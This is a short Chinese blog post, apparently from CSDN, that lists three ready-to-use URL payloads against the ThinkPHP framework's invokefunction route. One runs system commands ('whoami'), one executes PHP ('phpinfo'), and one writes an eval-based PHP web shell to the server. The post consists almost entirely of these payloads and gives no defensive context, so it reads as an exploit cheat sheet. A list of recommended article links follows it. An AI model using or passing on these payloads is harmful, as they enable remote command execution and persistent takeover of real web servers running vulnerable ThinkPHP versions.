Thinkphp(TP)

谪仙1232024-09-24 12:16

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars1\[\]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo '<?php @eval($_POSTcmd);?>' >1.php

相关推荐
wanhengidc7 小时前
服务器租用有何优点
运维·服务器·安全·web安全
csdn_aspnet7 小时前
Gemini赋能安全工程师,自动写PoC脚本,探索Gemini在网络安全领域辅助漏洞验证与POC生成的实战路径
安全·web安全·prompt·poc·gemini·工程师
Chengbei117 小时前
一站式源码安全检测工具、云安全 / APP / 小程序源码敏感信息递归多层目录扫描AK、JWT、手机号、身份证等敏感信息
java·开发语言·安全·web安全·网络安全·系统安全·安全架构
介一安全12 小时前
【漏洞学习】PHP+Windows环境通用文件上传漏洞深度剖析
windows·web安全·php·文件上传·安全性测试
上海云盾-高防顾问18 小时前
网络安全中一般指的雾资源是什么
安全·web安全
admin and root19 小时前
Blade站点的渗透测试到MySQL数据库权限接管
数据库·mysql·web安全·渗透测试·移动安全·培训·src赏金
上海云盾第一敬业销售19 小时前
深入了解WAF防护机制的架构解析与实战经验
安全·web安全·架构·ddos
虹科网络安全19 小时前
艾体宝方案|“110天“倒计时:CRA合规之路(四)
网络·安全·web安全
阿狸猿20 小时前
论网络安全体系设计
安全·web安全
Chockmans1 天前
春秋云境CVE-2020-21652(极速版)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2020-21652
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03Codex 接入 DeepSeek API 完整配置文档04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)09API Key 登录 Codex 也能用插件了,还支持会话删除和导出10几个好用的ip纯净度检测网站